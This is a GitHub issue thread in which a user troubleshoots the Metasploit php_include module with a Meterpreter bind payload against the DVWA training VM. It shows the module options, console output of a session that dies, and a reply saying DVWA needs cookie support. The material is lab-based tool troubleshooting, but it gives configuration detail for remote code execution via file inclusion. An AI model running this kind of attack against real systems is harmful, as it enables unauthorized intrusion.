question about PHP Meterpreter #809

anakin629 opened this Issue Sep 20, 2012 · 2 comments


None yet

3 participants


I am using this module
doing the test on DVWA this test VM which has a LFI test enviroment。
this is the basic config:

sf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

Name Current Setting Required Description

PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /opt/metasploit/msf3/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI /dvwa/vulnerabilities/fi/?page=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
POSTDATA no The POST data to send, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
SRVHOST yes The local host to listen on. This must be an address on the local machine or
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

Name Current Setting Required Description

LPORT 80 yes The listen port
RHOST no The target address

Exploit target:

Id Name

0 Automatic

msf exploit(php_include) >

# the result is

msf exploit(php_include) > exploit

[] Started bind handler
] Using URL:
[] Sending stage (39217 bytes) to
] Local IP:
[] PHP include server started.
] - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened ( -> at 2012-09-20 09:58:24 +0800
[-] Failed to load extension: No response was received to the core_loadlib request.

[-] Invalid session id

msf exploit(php_include) > sessions

I googled the error, it said some heart beat machnism, I do not understand !

can someone solve the problem ?


The php_include module did not support authenticated exploitation (the use of cookies) which DVWA requires.

I amended the script earlier this afternoon to support the passing of additional headers (cookies). See the following ticket for the code and usage information:


todb-r7 commented Nov 17, 2012

This is being tracked handily on Redmine at so closing this out -- we're trying to keep the GitHub issues strictly to Pull Requests, and keep bugs and questions and stuff over on Redmine (see ).

@todb-r7 todb-r7 closed this Nov 17, 2012
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment